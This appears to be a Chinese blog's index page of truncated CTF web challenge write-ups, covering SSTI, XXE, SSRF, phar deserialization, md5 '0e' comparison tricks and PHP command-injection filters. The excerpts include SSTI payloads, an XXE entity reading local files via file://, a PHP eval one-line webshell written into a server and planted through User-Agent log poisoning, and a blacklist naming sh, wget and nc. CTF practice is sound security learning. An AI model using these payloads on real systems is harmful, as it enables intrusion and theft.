web
yjj哈哈哈
这个作者很懒,什么都没留下…
展开
-
[CISCN 2019 初赛]Love Math
[CISCN 2019 初赛]Love Math打开题目链接得到源码<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算");原创 2021-01-24 10:26:18 · 138 阅读 · 0 评论 -
ez_rce
ez_rce打开链接,得到源码<?phperror_reporting(0);if (!isset($_POST['code'])) { highlight_file(__FILE__);} else { if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") { $str = $_POST['code']; $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '原创 2020-12-30 22:22:39 · 434 阅读 · 0 评论 -
攻防世界Confusion1
Confusion1打开链接,如图所示点击login,发现无法访问,查看一下源码,有flag的信息看了题解后知道是SSTI使用{{7*7}}最常用的{{''.__class__.__mro__[2].__subclasses__()}}发现被过滤了经过测试,过滤了很多关键字,如class,subclasses等。这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__{{''.__class__}} => {{''[原创 2020-12-09 10:23:49 · 766 阅读 · 0 评论 -
攻防世界blgdel
攻防世界blgdel打开链接,如图所示先注册一个账号并没有发现什么可以利用的点,只能用dirsearch扫一扫了发现了robots.txt,config.txt,sql.txt,upload.phprobots.txtconfig.txt<?phpclass master{ private $path; private $name; function __construct() { } function stream_open($path) {原创 2020-12-07 10:03:25 · 357 阅读 · 0 评论 -
攻防世界favorite_number
favorite_number打开链接得到源码<?php//php5.5.9$stuff = $_POST["stuff"];$array = ['admin', 'user'];if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc原创 2020-12-05 17:10:24 · 843 阅读 · 0 评论 -
[SUCTF 2019]Pythonginx
[SUCTF 2019]Pythonginx打开链接,得到源码@app.route('/getUrl', methods=['GET', 'POST'])def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsp原创 2020-12-02 10:47:29 · 183 阅读 · 0 评论 -
[NCTF2019]Fake XML cookbook
[NCTF2019]Fake XML cookbook打开链接,如图所示尝试注入,无果抓包进行分析这里看到username和password都是xml格式,这里应该是xml实体注入。简要来讲就是客户端向服务器发送了XML数据,这个数据能被我们控制,这样我们就可以增加一个恶意的外部实体,实现攻击。<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note [ <!ENTITY admin SYSTEM "file://原创 2020-12-01 22:12:29 · 109 阅读 · 0 评论 -
Header:请求头参数详解
Header:请求头参数详解Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/jsonAccept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5Accept-Encoding 指定浏览器可以支持的web服务器返回内容压缩编码类型。 Accept-Encoding: compress, gzipAccept-Language 浏览器可接受的语言 Accept原创 2020-12-01 19:49:35 · 795 阅读 · 0 评论 -
[De1CTF 2019]SSRF Me
[De1CTF 2019]SSRF Me打开链接,得到源码#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(_原创 2020-12-01 13:08:26 · 122 阅读 · 0 评论 -
Hackme ping
Hackme ping打开链接得到源码<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Ping</title></head><body> <form action="." method="GET"> IP: <input type="text" name=原创 2020-12-01 13:07:55 · 94 阅读 · 0 评论 -
CheckIN
CheckIN打开链接,得到源码<?php highlight_file(__FILE__);class ClassName{ public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&原创 2020-12-01 13:06:45 · 386 阅读 · 0 评论 -
[HarekazeCTF2019]encode_and_encode
[HarekazeCTF2019]encode_and_encode打开链接,如图所示点击Source Code,得到源码<?phperror_reporting(0);if (isset($_GET['source'])) { show_source(__FILE__); exit();}function is_valid($str) { $banword = [ // no path traversal '\.\.', // no strea原创 2020-12-01 13:09:00 · 339 阅读 · 0 评论 -
BUUCTF [MRCTF2020]套娃
BUUCTF [MRCTF2020]套娃打开链接,查看源码,如图所示关于$_SERVER[‘QUERY_STRING’]取值,例如: http://localhost/aaa/?p=222$_SERVER[‘QUERY_STRING’] = “p=222”;substr_count()函数计算子串在字符串中出现的次数PS:子串区分大小写上述代码不能出现’_’和’%5f’,可以用‘ ’或‘.’或‘ %5F’绕过通过get取得的参数b_u_p_t不等于23333但是正则,匹配需要匹配到2333原创 2020-11-30 20:35:16 · 215 阅读 · 0 评论 -
给你个shell
给你个shell打开链接,如图所示查看源码,发现view_source<?php//It's no need to use scanner. Of course if you want, but u will find nothing.error_reporting(0);include "config.php";if (isset($_GET['view_source'])) { show_source(__FILE__); die;}function ch原创 2020-11-30 19:44:42 · 206 阅读 · 0 评论 -
1024杯-柏拉图
1024杯-柏拉图打开链接后得到如图界面输入file:/file:////var/www/html/index.php读取源码,这里过滤了file://,用双写绕过分别读取upload.php,readfile.php,unlink.php,class.php构造pop链<?phpini_set('phar.readonly','Off');class A { public $a;public function __construct($a) { $this->a =原创 2020-11-30 16:57:50 · 400 阅读 · 0 评论 -
校赛Hodor
校赛Hodor打开链接,如图所示查看源码get方式传入source,得到源码<?phpClass Source { public function __toString() { return highlight_file('license.txt', true).highlight_file($this->source, true); }}function easy_check($str) { //echo $str; if原创 2020-11-30 16:48:39 · 118 阅读 · 0 评论 -
ctf.show_web4
ctf.show_web4打开链接,如图所示测试文件包含未成功采用日志注入,查看日志默认路径?url=/var/log/nginx/access.log这里需要把一句话木马加在User-Agent里用蚁剑连接,得到flag原创 2020-11-30 16:38:38 · 536 阅读 · 0 评论 -
校赛VulnCMS
校赛VulnCMS打开链接得到一个网页。找到了两处可以读取任意文件的地方。根据登陆界面 http://202.119.201.199:9002/member/index/login 猜测存在后台管理界面访问http://202.119.201.199:9002/admin/index/login ,猜测账号密码都为admin,进入管理员界面后,如图所示。发现输入命令的地方。> echo '<?php @eval($_POST["fe1w0"]);phpinfo();?>原创 2020-11-30 16:32:14 · 504 阅读 · 0 评论 -
CTF show WEB5
CTF show WEB5md5漏洞介绍:PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 。 只要是0e开头的md5值,默认为相等 。这里附上常见的0E开头的MD50e开头的md5和原值:QNKCDZO0e8304004519934940580242199033912406107080e462097431906509019562988736854s878926199a0e545993274517709034328855841020s155964671a0e34原创 2020-11-30 16:18:32 · 171 阅读 · 0 评论